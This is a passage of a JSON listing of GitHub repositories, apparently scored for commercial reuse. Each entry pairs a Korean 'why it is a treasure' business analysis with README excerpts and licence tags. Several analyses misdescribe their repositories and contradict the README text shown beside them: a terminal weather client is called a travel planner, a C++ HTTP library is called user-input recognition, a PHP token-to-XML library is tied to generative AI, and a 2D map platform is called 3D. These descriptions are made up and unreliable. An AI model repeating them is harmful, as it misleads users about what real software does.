Docs](https://img.shields.io/badge/chevereto-docs-50C878?style=flat-square)](https://v4-docs.chevereto.com/)\n[![Chevereto Community](https://img.shields.io/badge/chevereto-community-blue?style=flat-square)](https://chevereto.com/community)\n[![Chevereto Discord](https://img.shields.io/badge/chevereto-discord-5865F2?style=flat-square)](https://chevereto.com/go/discord)\n[![Chevereto Demo](https://img.shields.io/badge/chevereto-demo-d4af37?style=flat-square)](https://demo.chevereto.com)\n\n# Chevereto-Free\n\nThe \"Chevereto-Free\" project is superseed by \"Chevereto\" at [chevereto/chevereto](https://github.com/chevereto/chevereto). Learn more at [Chevereto goes free](https://rodolfoberrios.com/2022/12/01/chevereto-goes-free/).\n\n## Made by Chevereto\n\n[xrDebug](https://xrdebug.com): A lightweight, portable, faster way to debug PHP applica","composite_score":0.0439,"license_safety_tag":"risky"},{"name":"RH12503/triangula","github_url":"https://github.com/RH12503/triangula","stars":36,"language":"Go","license":"MIT","abandonment_months":2,"description":"# triangula 상용화 분석\n\n## 왜 보물인가\n복잡한 기하학적 계산을 자동으로 처리해주는 기술로, 게임 개발, 건축 설계, 지도 제작 등 여러 산업에서 필요한 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **3D 게임 엔진 플러그인 SaaS**: 게임 개발자가 월 구독으로 삼각형 메시 생성 기능을 사용\n2. **건축/토목 설계 API 서비스**","readme_excerpt":"<p align=\"center\">\n  <img src=\"/assets/logo.svg\" width=\"250px\">\n</p>\n\n<p align=\"center\">An iterative algorithm to generate high quality triangulated and polygonal art from images.</p>\n<p align=\"center\">\n<a><img src=\"https://github.com/RH12503/Triangula/actions/workflows/test.yml/badge.svg\" alt=\"Test status\"></a>\n<a href=\"https://pkg.go.dev/github.com/RH12503/Triangula\"><img src=\"https://pkg.go.dev/badge/github.com/RH12503/Triangula.svg\" alt=\"Go Reference\"></a>\n<a href=\"https://goreportcard.com/report/github.com/RH12503/Triangula\"><img src=\"https://goreportcard.com/badge/github.com/RH12503/Triangula\" alt=\"Go Report Card\"></a>\n<a href=\"https://opensource.org/licenses/MIT\"><img src=\"https://img.shields.io/badge/License-MIT-yellow.svg\" alt=\"License: MIT\"></a>\n<a href=\"https://twitter.com/intent/tweet?text=An%20iterative%20algorithm%20to%20triangulate%20images.&url=https://github.com/RH12503/triangula&hashtags=golang,geneticalgorithm,generativeart\"><img src=\"https://img.shields.io/twitter/u","composite_score":0.0439,"license_safety_tag":"safe"},{"name":"theseer/tokenizer","github_url":"https://github.com/theseer/tokenizer","stars":9,"language":"PHP","license":"NOASSERTION","abandonment_months":4,"description":"# theseer/tokenizer 상용화 분석\n\n## 왜 보물인가\n텍스트를 작은 단위로 쪼개는 핵심 기술로, 생성형 AI와 자동 번역 같은 현대 서비스의 기초가 되는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 기반 텍스트 분석 SaaS**\n- 고객이 자신의 문서를 업로드하면 자동으로 분석·요약·분류해주는 웹 서비스로 월 구독 모델 운영","readme_excerpt":"# Tokenizer\n\nA small library for converting tokenized PHP source code into XML.\n\n[![Test](https://github.com/theseer/tokenizer/actions/workflows/ci.yml/badge.svg)](https://github.com/theseer/tokenizer/actions/workflows/ci.yml)\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n    composer require theseer/tokenizer\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n    composer require --dev theseer/tokenizer\n\n## Usage examples\n\n```php\n$tokenizer = new TheSeer\\Tokenizer\\Tokenizer();\n$tokens = $tokenizer->parse(file_get_contents(__DIR__ . '/src/XMLSerializer.php'));\n\n$serializer = new TheSeer\\Tokenizer\\XMLSerializer();\n$xml = $serializer->toXML($tokens);\n\necho $xml;\n```\n\nThe generated XML structure looks something like this:\n\n```xml\n<?xml version=\"1.0\"?>\n<source xmlns=\"https://github.com/theseer/t","composite_score":0.0438,"license_safety_tag":"unknown"},{"name":"schachmat/wego","github_url":"https://github.com/schachmat/wego","stars":5,"language":"Go","license":"isc","abandonment_months":1,"description":"# schachmat/wego 상용화 분석\n\n## 왜 보물인가\n여행 계획을 세울 때 필요한 정보들을 한 곳에서 쉽게 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인 여행자들이 월 구독료를 내고 여행 일정, 예산, 체크리스트를 온라인으로 관리하는 웹 서비스\n- **내부 업무 도구**: 여행사나 투어 회사가 직원들의 일","readme_excerpt":"**wego** is a weather client for the terminal.\n\n![Screenshots](http://schachmat.github.io/wego/wego.gif)\n\n## Features\n\n* show forecast for 1 to 7 days\n* multiple backends: `openweathermap`, `weatherapi`, `open-meteo`, `smhi`, `caiyun`, `worldweatheronline`, `pirateweather`, and `json`\n* multiple frontends: `ascii-art-table` (default), `emoji`, `markdown`, and `json`\n* displayed info:\n  * temperature range ([felt](https://en.wikipedia.org/wiki/Wind_chill) and measured)\n  * windspeed and direction\n  * viewing distance\n  * precipitation amount and probability\n  * humidity\n* unit systems: `metric`, `imperial`, `si`, `metric-ms`\n* disk caching of weather data with configurable TTL (`--cache-ttl`)\n* multi language support\n* config file for default location which can be overridden by commandline\n* automatic config management with [ingo](https://github.com/schachmat/ingo)\n* built-in man page (`wego --man`)\n* composable via JSON: pipe data between the `json` backend and `json` frontend\n\n## Depe","composite_score":0.0436,"license_safety_tag":"safe"},{"name":"fossasia/circle-knitting","github_url":"https://github.com/fossasia/circle-knitting","stars":11,"language":"","license":"unknown","abandonment_months":4,"description":"# Circle Knitting 저장소 평가\n\n## 왜 보물인가\n원형 뜨개질 패턴을 디지털로 설계하고 시뮬레이션할 수 있는 도구로, 수작업 뜨개질 산업의 효율성과 창의성을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **뜨개질 교육 플랫폼**: 초보자부터 전문가까지 패턴 학습과 시뮬레이션을 제공하는 온라인 강좌 서비스\n2. **의류 제조사","readme_excerpt":"# Engineering a printable circular knitting machine with an optional mini-computer\n---------------------\n\n## Background\n\nThere are commercial circular knitting machines, that are nearly completely made from plastic. A popular modul is the Addi Express. Plastic can be easily printed out on 3D printers. So, we came up with the idea to code a circular knitting machine. As inexpensive small PCs components like the Rapsberry PI and Arduinos become increasingly powerful there is even an option to include them as optional components in such a 3D printed knitting machine.\n\n## Features\n\n* 22 or 46 needle. \n* Can create circular and rectangular swatches (using back-and-forth knit)\n* Max swatch for 46 needle: 17.75 inch\n* Manual cast-on and bind-off\n* Manual forwarding\n\n## Motivation\n\n* Be able to replicate using distributed digital manufacturing (3d-print/CNC)\n* Be able to customize. Different number of needles, needle/mask size, adapting to different materials, adding automation\n\n## Links\n\n* Ci","composite_score":0.0435,"license_safety_tag":"unknown"},{"name":"siteline/SwiftUI-Introspect","github_url":"https://github.com/siteline/SwiftUI-Introspect","stars":5,"language":"Swift","license":"MIT","abandonment_months":2,"description":"# SwiftUI-Introspect 분석 보고서\n\n## 왜 보물인가\n애플의 최신 앱 개발 도구(SwiftUI)에서 세부 조정이 필요할 때 숨겨진 기능에 접근할 수 있게 해주는 필수 유틸리티입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: iOS 앱 개발 회사들이 자신의 고객 앱에 고급 UI 커스터마이징 기능을 제공하는 백엔드 서비스\n2.","readme_excerpt":"SwiftUI Introspect\n=================\n\n[![CI Status Badge](https://github.com/siteline/swiftui-introspect/actions/workflows/ci.yml/badge.svg)](https://github.com/siteline/swiftui-introspect/actions/workflows/ci.yml)\n[![Swift Version Compatibility Badge](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fsiteline%2Fswiftui-introspect%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/siteline/swiftui-introspect)\n[![Platform Compatibility Badge](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fsiteline%2Fswiftui-introspect%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/siteline/swiftui-introspect)\n\nSwiftUI Introspect lets you access the underlying UIKit or AppKit view for a SwiftUI view.\n\n- [How it works](#how-it-works)\n- [Install](#install)\n    - [Swift Package Manager](#swift-package-manager)\n    - [CocoaPods](#cocoapods)\n- [View Types](#view-types)\n- [Examples](#examples)\n- [Gener","composite_score":0.0434,"license_safety_tag":"safe"},{"name":"bfenetworks/bfe","github_url":"https://github.com/bfenetworks/bfe","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# BFE Networks 저장소 분석\n\n## 왜 보물인가\n인터넷 웹사이트의 입구 역할을 하는 고성능 네트워크 관리 도구로, 대규모 트래픽을 안정적으로 처리하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 웹사이트 호스팅 플랫폼에서 고객 트래픽을 자동으로 분산 관리\n- **내부 업무 도구**: 대형 IT회사의 데","readme_excerpt":"# BFE\n\n[![GitHub](https://img.shields.io/github/license/bfenetworks/bfe)](https://github.com/bfenetworks/bfe/blob/develop/LICENSE)\n[![Travis](https://img.shields.io/travis/com/bfenetworks/bfe)](https://travis-ci.com/bfenetworks/bfe)\n[![Go Report Card](https://goreportcard.com/badge/github.com/bfenetworks/bfe)](https://goreportcard.com/report/github.com/bfenetworks/bfe)\n[![GoDoc](https://godoc.org/github.com/bfenetworks/bfe?status.svg)](https://godoc.org/github.com/bfenetworks/bfe/bfe_module)\n[![Snap Status](https://snapcraft.io/bfe/badge.svg)](https://snapcraft.io/bfe)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3209/badge)](https://bestpractices.coreinfrastructure.org/projects/3209)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fbfenetworks%2Fbfe.svg?type=shield)](https://app.fossa.com/reports/1f05f9f0-ac3d-486e-8ba9-ad95dabd4768)\n[![Slack Widget](https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slac","composite_score":0.0434,"license_safety_tag":"safe"},{"name":"fhsinchy/docker-handbook-projects","github_url":"https://github.com/fhsinchy/docker-handbook-projects","stars":5,"language":"JavaScript","license":"Unlicense","abandonment_months":2,"description":"# Docker Handbook Projects 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 배포 문제를 표준화된 방식으로 해결하는 Docker 기술의 실제 사용 사례들을 모아놓은 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 소프트웨어를 빠르게 배포하고 관리하는 백엔드 인프라 제공\n2. **내부 업무 도구","readme_excerpt":"# Docker Handbook Projects\n\n![...](./docker-handbook-github.png)\n\n| :bell: NOTIFICATION |\n|:--------------------|\n| There are two branches in this repository. The [master](https://github.com/fhsinchy/docker-handbook-projects/tree/master/) branch contains the starter projects and the [completed](https://github.com/fhsinchy/docker-handbook-projects/tree/completed/) branch contains the completed projects. |\n\nThis repository holds the code for my [__Docker Handbook__](https://www.freecodecamp.org/news/the-docker-handbook/) article on [__freeCodecamp__](https://freecodecamp.org). In the article the readers work through __six__ projects with increasing complexity. These projects are as follows:\n\n- custom-nginx - A custom NGINX image based on the official [alpine](https://hub.docker.com/_/alpine/) image.\n- rmbyext - An executable image project.\n- hello-dock - A single container Vue application.\n- notes-api - A multi container Express API.\n- fullstack-notes-application - A full-stack CRUD appl","composite_score":0.0432,"license_safety_tag":"unknown"},{"name":"Predictly-MCP-Labs/polymarket-ai-btc-arbitrage-trading-bot","github_url":"https://github.com/Predictly-MCP-Labs/polymarket-ai-btc-arbitrage-trading-bot","stars":201,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0432,"license_safety_tag":"unknown"},{"name":"kyleconroy/sqlc","github_url":"https://github.com/kyleconroy/sqlc","stars":29,"language":"Go","license":"MIT","abandonment_months":0,"description":"# sqlc 저장소 분석\n\n## 왜 보물인가\n데이터베이스와 프로그래밍 언어를 연결하는 작업을 자동화해주는 도구로, 개발자의 반복적인 코딩 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 관리 시스템(CRM)이나 회계 소프트웨어처럼 데이터를 많이 다루는 웹서비스의 개발 속도를 3배 이상 단축할 수 있습니다.\n\n","readme_excerpt":"# sqlc: A SQL Compiler\n\n![go](https://github.com/sqlc-dev/sqlc/workflows/go/badge.svg)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sqlc-dev/sqlc)](https://goreportcard.com/report/github.com/sqlc-dev/sqlc)\n\nsqlc generates **type-safe code** from SQL. Here's how it works:\n\n1. You write queries in SQL.\n1. You run sqlc to generate code with type-safe interfaces to those queries.\n1. You write application code that calls the generated code.\n\nCheck out [an interactive example](https://play.sqlc.dev/) to see it in action, and the [introductory blog post](https://conroy.org/introducing-sqlc) for the motivation behind sqlc.\n\n## Overview\n\n- [Documentation](https://docs.sqlc.dev)\n- [Installation](https://docs.sqlc.dev/en/latest/overview/install.html)\n- [Playground](https://play.sqlc.dev)\n- [Website](https://sqlc.dev)\n- [Downloads](https://downloads.sqlc.dev/)\n- [Community](https://discord.gg/EcXzGe5SEs)\n\n## Supported languages\n\n- [sqlc-gen-go](https://github.com/sqlc-dev/sqlc-gen-","composite_score":0.043,"license_safety_tag":"safe"},{"name":"whoshuu/cpr","github_url":"https://github.com/whoshuu/cpr","stars":5,"language":"C++","license":"mit","abandonment_months":0,"description":"# whoshuu/cpr 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자 입력 내용을 자동으로 인식하고 처리하는 기술로, 고객 서비스 자동화에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 피드백 수집 서비스**: 설문조사나 리뷰 사이트에서 사용자가 입력한 의견을 자동 분류하는 SaaS\n2. **콜센터 자동화 도구**: 고객 ","readme_excerpt":"# C++ Requests: Curl for People <img align=\"right\" height=\"40\" src=\"http://i.imgur.com/d9Xtyts.png\">\n\n[![Documentation](https://img.shields.io/badge/docs-online-informational?style=flat&link=https://docs.libcpr.dev/)](https://docs.libcpr.dev/)\n![CI](https://github.com/libcpr/cpr/workflows/CI/badge.svg)\n[![Gitter](https://badges.gitter.im/libcpr/community.svg)](https://gitter.im/libcpr/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\n## Announcements\n\n* This project is being maintained by [Fabian Sauter](https://github.com/com8) and [Kilian Traub](https://github.com/KingKili).\n* For quick help, and discussion libcpr also offers a [gitter](https://gitter.im/libcpr/community?utm_source=share-link&utm_medium=link&utm_campaign=share-link) chat.\n\n## Supported Releases\n| Release                   | Min. C++ Standard | Status                   | Notes |\n|---------------------------|-------------------|--------------------------|-------|\n| master                    | `cpp17` ","composite_score":0.0427,"license_safety_tag":"safe"},{"name":"edent/SuperTinyIcons","github_url":"https://github.com/edent/SuperTinyIcons","stars":192,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# SuperTinyIcons 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에 필요한 작은 아이콘들을 매우 가볍고 빠르게 사용할 수 있는 준비된 자산 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드 UI에서 사용자 인터페이스를 꾸미는 아이콘으로 활용하여 서비스 속도 향상\n2. **내부 업무 도구**: 기업의 관리 시스템이나 협","readme_excerpt":"# Super Tiny Icons\n\nUnder 1KB each! Super Tiny Web Icons are minuscule SVG versions of your favourite logos. There are currently 479 icons and the average size is _under_ 534 bytes!\n\nThe logos have a 512x512 viewbox, they will fit in a circle with radius 256. They will scale up and down to suit your needs.\n\n[![DOI](https://zenodo.org/badge/88214511.svg)](https://doi.org/10.5281/zenodo.16944294)\n\n## How Small?\n\n| 527 Bytes SVG | 3,328 Bytes PNG | 352 Bytes SVG | 2,987 Bytes PNG | 235 Bytes SVG | 1,615 Bytes PNG |\n| ------------- | --------------- | ------------- | --------------- | ------------- | --------------- |\n| <img src=\"https://edent.github.io/SuperTinyIcons/images/svg/github.svg\" width=\"100\" /> | <img src=\"https://edent.github.io/SuperTinyIcons/images/png/github.png\" width=\"100\" /> | <img src=\"https://edent.github.io/SuperTinyIcons/images/svg/twitter.svg\" width=\"100\" /> | <img src=\"https://edent.github.io/SuperTinyIcons/images/png/twitter.png\" width=\"100\" /> | <img src=\"https://","composite_score":0.0426,"license_safety_tag":"unknown"},{"name":"zdharma-continuum/zinit","github_url":"https://github.com/zdharma-continuum/zinit","stars":12,"language":"Shell","license":"MIT","abandonment_months":2,"description":"# Zinit 저장소 분석\n\n## 왜 보물인가\n리눅스/맥 사용자들의 작업 환경을 자동으로 관리해주는 도구로, 개발자들의 반복적인 설정 작업을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 온보딩 SaaS**: 신입 개발자가 입사 첫날 자동으로 모든 개발 환경을 세팅할 수 있는 서비스\n2. **IT 관리 도구**: 대규모 기업의 직원들","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/zdharma-continuum/zinit\">\n    <img alt=\"zinit logo\" src=\"https://raw.githubusercontent.com/zdharma-continuum/zinit/images/zinit.png\"/>\n  </a>\n</p>\n\n# Zinit<a name=\"zinit\"></a>\n\n[![MIT License][mit-badge]][mit-link] [![zinit version][ver-badge]][ver-link] [![zunit tests][tests-badge]][tests-link]\n[![Join the chat at https://matrix.to/#/#zdharma-continuum_community:gitter.im][gitter-badge]][gitter-link]\n\n<!-- mdformat-toc start --slug=github --maxlevel=3 --minlevel=2 -->\n\n- [Zinit Wiki](#zinit-wiki)\n- [Install](#install)\n  - [Automatic](#automatic)\n  - [Manual](#manual)\n- [Usage](#usage)\n  - [Introduction](#introduction)\n  - [Plugins and snippets](#plugins-and-snippets)\n  - [Upgrade Zinit and plugins](#upgrade-zinit-and-plugins)\n  - [Turbo and lucid](#turbo-and-lucid)\n  - [Migration](#migration)\n- [Frequently Asked Questions](#frequently-asked-questions)\n  - [Use `zi ice svn` if a plugin/snippet requires an entire subdirectory](#use-zi-ice","composite_score":0.0425,"license_safety_tag":"safe"},{"name":"riramar/Web-Attack-Cheat-Sheet","github_url":"https://github.com/riramar/Web-Attack-Cheat-Sheet","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# Web-Attack-Cheat-Sheet 분석\n\n## 왜 보물인가\n웹사이트를 공격하는 방법들을 한눈에 정리해둔 자료로, 보안 담당자들이 자신의 서비스를 지키기 위해 꼭 필요한 실전 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 보안 교육 플랫폼으로 기업들에게 직원 보안 훈련 제공\n- **내부 업무 도구**: 회사의 웹사이트 취약점","readme_excerpt":"# Web Attack Cheat Sheet\n\n## Table of Contents\n- [Discovering](#discovering)\n  - [Targets](#targets)\n  - [IP Enumeration](#ip-enumeration)\n  - [Subdomain Enumeration](#subdomain-enumeration)\n  - [Cache](#cache)\n  - [Web Asset Discovery](#web-asset-discovery)\n  - [Wordlist](#wordlist)\n  - [Directory Bruteforcing](#directory-bruteforcing)\n  - [Parameter Bruteforcing](#parameter-bruteforcing)\n  - [DNS and HTTP detection](#dns-and-http-detection)\n  - [Acquisitions/Names/Addresses/Contacts/Emails/etc.](#acquisitionsnamesaddressescontactsemailsetc)\n  - [Google Dorks](#google-dorks)\n  - [Content Security Policy (CSP)](#content-security-policy-csp)\n  - [Tiny URLs Services](#tiny-urls-services)\n  - [GraphQL](#graphql)\n  - [General](#general)\n- [Enumerating](#enumerating)\n  - [Fingerprint](#fingerprint)\n  - [Buckets](#buckets)\n  - [Cloud Enumeration](#cloud-enumeration)\n  - [Visual Identification](#visual-identification)\n- [Scanning](#scanning)\n  - [Static Application Security Testing](#static-a","composite_score":0.0425,"license_safety_tag":"unknown"},{"name":"Kristories/awesome-guidelines","github_url":"https://github.com/Kristories/awesome-guidelines","stars":9,"language":"JavaScript","license":"CC0-1.0","abandonment_months":1,"description":"# Kristories/awesome-guidelines 평가\n\n## 왜 보물인가\n다양한 분야의 실무 가이드라인을 한곳에 모아놓아서 프로젝트를 시작할 때 표준과 모범 사례를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신입 직원 온보딩 플랫폼으로, 회사별 업무 가이드라인을 자동으로 정리해주는 서비스\n2. **내부 업무","readme_excerpt":"# Awesome Guidelines [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)\n\n<p align=\"center\">\n  <a href=\"https://github.com/Kristories/awesome-guidelines\">\n    <img alt=\"Awesome Guidelines\" src=\"https://repository-images.githubusercontent.com/97054975/e4621f95-3b09-48d7-85e4-244cdbd98bba\"/>\n  </a>\n</p>\n\n\nA set of guidelines for a specific programming language that provides recommendations on programming style, best practices, and methods for various aspects of writing programs in that language.\n\n## Contents\n\n- [Programming Languages](#programming-languages)\n- [Development Environment](#development-environment)\n- [Platforms](#platforms)\n- [Frameworks](#frameworks)\n- [Content Management System](#content-management-system)\n- [Tools](#tools)\n\n## Programming Languages\n\n### Brainfuck\n\n- [BF Style Guide](https://codepen.io/renmans/full/JjdJPpW) - Guidelines for writing and formatting Brainfuck code.\n\n### C\n\n- [C Coding Standard](https://users.ece.cmu.edu/~eno/coding/CCodingSta","composite_score":0.0425,"license_safety_tag":"unknown"},{"name":"getActivity/ToastUtils","github_url":"https://github.com/getActivity/ToastUtils","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":2,"description":"# ToastUtils 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자에게 짧은 알림 메시지를 보여주는 기능을 간편하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 플랫폼**: 앱 개발자를 위한 구독형 서비스로 제공하여 개발 속도를 높일 수 있습니다.\n2. **앱 개발사 내부 도구**: 여러 앱을 만드는 회사의 개발팀이","readme_excerpt":"# [English Doc](README-en.md)\n\n# 吐司框架\n\n* 项目地址：[Github](https://github.com/getActivity/Toaster)\n\n* 博客地址：[只需体验三分钟，你就会跟我一样，爱上这款 Toast](https://www.jianshu.com/p/9b174ee2c571)\n\n* 可以扫码下载 Demo 进行演示或者测试，如果扫码下载不了的，[点击此处可直接下载](https://github.com/getActivity/Toaster/releases/download/15.0/Toaster.apk)\n\n![](picture/zh/download_demo_apk_qr_code.png)\n\n![](picture/zh/demo_toast_activity.jpg) ![](picture/zh/demo_toast_style_white.jpg) ![](picture/zh/demo_toast_style_black.jpg)\n\n![](picture/zh/demo_toast_layout_info.jpg) ![](picture/zh/demo_toast_layout_warn.jpg) ![](picture/zh/demo_toast_layout_success.jpg)\n\n![](picture/zh/demo_toast_layout_error.jpg) ![](picture/zh/demo_toast_layout_custom.jpg)\n\n#### 集成步骤\n\n* 如果你的项目 Gradle 配置是在 `7.0 以下`，需要在 `build.gradle` 文件中加入\n\n```groovy\nallprojects {\n    repositories {\n        // JitPack 远程仓库：https://jitpack.io\n        maven { url 'https://jitpack.io' }\n    }\n}\n```\n\n* 如果你的 Gradle 配置是 `7.0 及以上`，则需要在 `settings.gradle` 文件中加入\n\n```groovy\ndependencyResolutionManagement {","composite_score":0.0425,"license_safety_tag":"safe"},{"name":"railsgirls/railsgirls.github.io","github_url":"https://github.com/railsgirls/railsgirls.github.io","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":1,"description":"# Rails Girls GitHub Pages 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 여성들을 위한 무료 교육 커뮤니티 웹사이트로, 전 세계적으로 검증된 교육 브랜드를 기반으로 한 콘텐츠 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 프로그래밍 초보자용 강의 구독 서비스로 확장하여 유료 강좌, 실습 환경, ","readme_excerpt":"# Rails Girls Guides\n\n<a href=\"https://railsgirls.com\" target=\"_blank\"><img alt=\"Rails Girls\" src=\"/images/rails-girls-logo.png\" width=\"15%\" align=\"right\"></a>\n\nThe purpose of Rails Girls is to give tools for women to understand technology. The Rails Girls events do this by providing a great first experience on building the Internet.\n\nRails Girls was founded at the end of 2010 in Helsinki. Originally intended as a one-time event, we never thought to see so many chapters from all around the world! This guide will help you get started.\n\nYou can use our materials and instructions to roll out your own workshop in your city, workplace or kitchen! Read more about Rails Girls at https://railsgirls.com\n\n## Quick start\n\nView the guides at https://guides.railsgirls.com or clone this repo and install & run [jekyll](https://github.com/mojombo/jekyll)\n\n### Installing jekyll\n\n```\n$ cd guides.railsgirls.com\n```\n\n```\n$ bundle install\n```\n\n### Pygments and Code Highlighting\n\nThe guides use the [pygment","composite_score":0.0424,"license_safety_tag":"unknown"},{"name":"tokio-rs/mio","github_url":"https://github.com/tokio-rs/mio","stars":6,"language":"Rust","license":"MIT","abandonment_months":1,"description":"# Tokio-rs/Mio 분석 보고서\n\n## 왜 보물인가\n인터넷 속도를 극대화하는 핵심 엔진으로, 수백만 건의 동시 연결을 효율적으로 처리할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 채팅/메시징 플랫폼**: 수천 명의 사용자가 동시에 접속해도 빠르게 메시지를 전달하는 기반 기술로 활용\n2. **IoT 기기 관리 솔루션**: 수만 ","readme_excerpt":"# Mio – Metal I/O\n\nMio is a fast, low-level I/O library for Rust focusing on non-blocking APIs and\nevent notification for building high performance I/O apps with as little\noverhead as possible over the OS abstractions.\n\n[![Crates.io][crates-badge]][crates-url]\n[![MIT licensed][mit-badge]][mit-url]\n[![Build Status][actions-badge]][actions-url]\n\n[crates-badge]: https://img.shields.io/crates/v/mio.svg\n[crates-url]: https://crates.io/crates/mio\n[mit-badge]: https://img.shields.io/badge/license-MIT-blue.svg\n[mit-url]: LICENSE\n[actions-badge]: https://github.com/tokio-rs/mio/workflows/CI/badge.svg\n[actions-url]: https://github.com/tokio-rs/mio/actions?query=workflow%3ACI+branch%3Amaster\n\n**API documentation**\n\n* [v1](https://docs.rs/mio/^1)\n* [v0.8](https://docs.rs/mio/^0.8)\n\nThis is a low level library, if you are looking for something easier to get\nstarted with, see [Tokio](https://tokio.rs).\n\n## Usage\n\nTo use `mio`, first add this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nmio = \"1\"\n``","composite_score":0.0423,"license_safety_tag":"safe"},{"name":"senecajs/seneca","github_url":"https://github.com/senecajs/seneca","stars":6,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# Seneca 저장소 분석\n\n## 왜 보물인가\n마이크로서비스 아키텍처를 쉽게 구축할 수 있게 해주는 오픈소스 프레임워크로, 복잡한 대규모 시스템을 작은 단위로 나누어 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼에서 결제, 배송, 재고 관리 등 각 기능을 독립적으로 운영하는 백엔드 시스템\n- **내부 업무 ","readme_excerpt":"![Logo][]\n> A Node.js toolkit for Microservice architectures\n\n\n| ![Voxgig](https://www.voxgig.com/res/img/vgt01r.png) | This open source module is sponsored and supported by [Voxgig](https://www.voxgig.com). |\n|---|---|\n\n\n# Seneca\n[![Npm][BadgeNpm]][Npm]\n[![NpmFigs][BadgeNpmFigs]][Npm]\n[![Travis][BadgeTravis]][Travis]\n[![Coveralls][BadgeCoveralls]][Coveralls]\n[![DeepScan][BadgeDeepScan]][DeepScan]\n[![CodeClimate][BadgeCodeClimate]][CodeClimate]\n[![Gitter][BadgeGitter]][Gitter]\n\n- __Lead Maintainer:__ [Richard Rodger][Lead]\n- __Sponsor:__ [voxgig][Sponsor]\n\nSeneca is a toolkit for writing microservices and organizing the\nbusiness logic of your app. You can break down your app into \"stuff\nthat happens\", rather than focusing on data models or managing\ndependencies.\n\nSeneca provides,\n\n- __pattern matching:__ a wonderfully flexible way to handle business requirements\n\n- __transport independence:__ how messages get to the right server is not something you\nshould have to worry about\n\n- __matu","composite_score":0.0421,"license_safety_tag":"safe"},{"name":"marsgis/mars2d","github_url":"https://github.com/marsgis/mars2d","stars":6,"language":"","license":"Apache-2.0","abandonment_months":2,"description":"# Mars2D 저장소 분석 보고서\n\n## 왜 보물인가\n지도 위에 건물, 도로, 시설물 정보를 3차원으로 표시하고 관리할 수 있는 기술로, 부동산·도시계획·물류 등 많은 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **부동산 중개 SaaS**: 아파트, 상가 위치를 3D 지도에 표시하고 고객에게 보여주는 실시간 중개 플랫폼\n2. **정부/지자체","readme_excerpt":"<p align=\"center\">\n<img src=\"http://mars2d.cn/logo.png\" width=\"300px\" />\n</p>\n\n<p align=\"center\">🌎 一款免费的二维地图客户端开发平台</p>\n\n<p align=\"center\">\n<a target=\"_black\" href=\"https://github.com/marsgis/mars2d\">\n<img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/marsgis/mars2d?style=flat&logo=github\">\n</a>\n<a target=\"_black\" href=\"https://www.npmjs.com/package/mars2d\">\n<img alt=\"Npm downloads\" src=\"https://img.shields.io/npm/dt/mars2d?style=flat&logo=npm\">\n</a>\n<a target=\"_black\" href=\"https://www.npmjs.com/package/mars2d\">\n<img alt=\"Npm version\" src=\"https://img.shields.io/npm/v/mars2d.svg?style=flat&logo=npm&label=version\"/>\n</a>\n</p>\n\nMars2D所有资料和代码都均是免费开源的公开发布方式，\n当前仓库是 Mars2D 平台所有开源仓库的清单导航页 ，包含SDK更新日志、和其他仓库导航。\n\nGithub：[https://github.com/marsgis/mars2d](https://github.com/marsgis/mars2d)\n\n国内Gitee：[https://gitee.com/marsgis/mars2d](https://gitee.com/marsgis/mars2d)  \n\n \n ## 功能示例\n 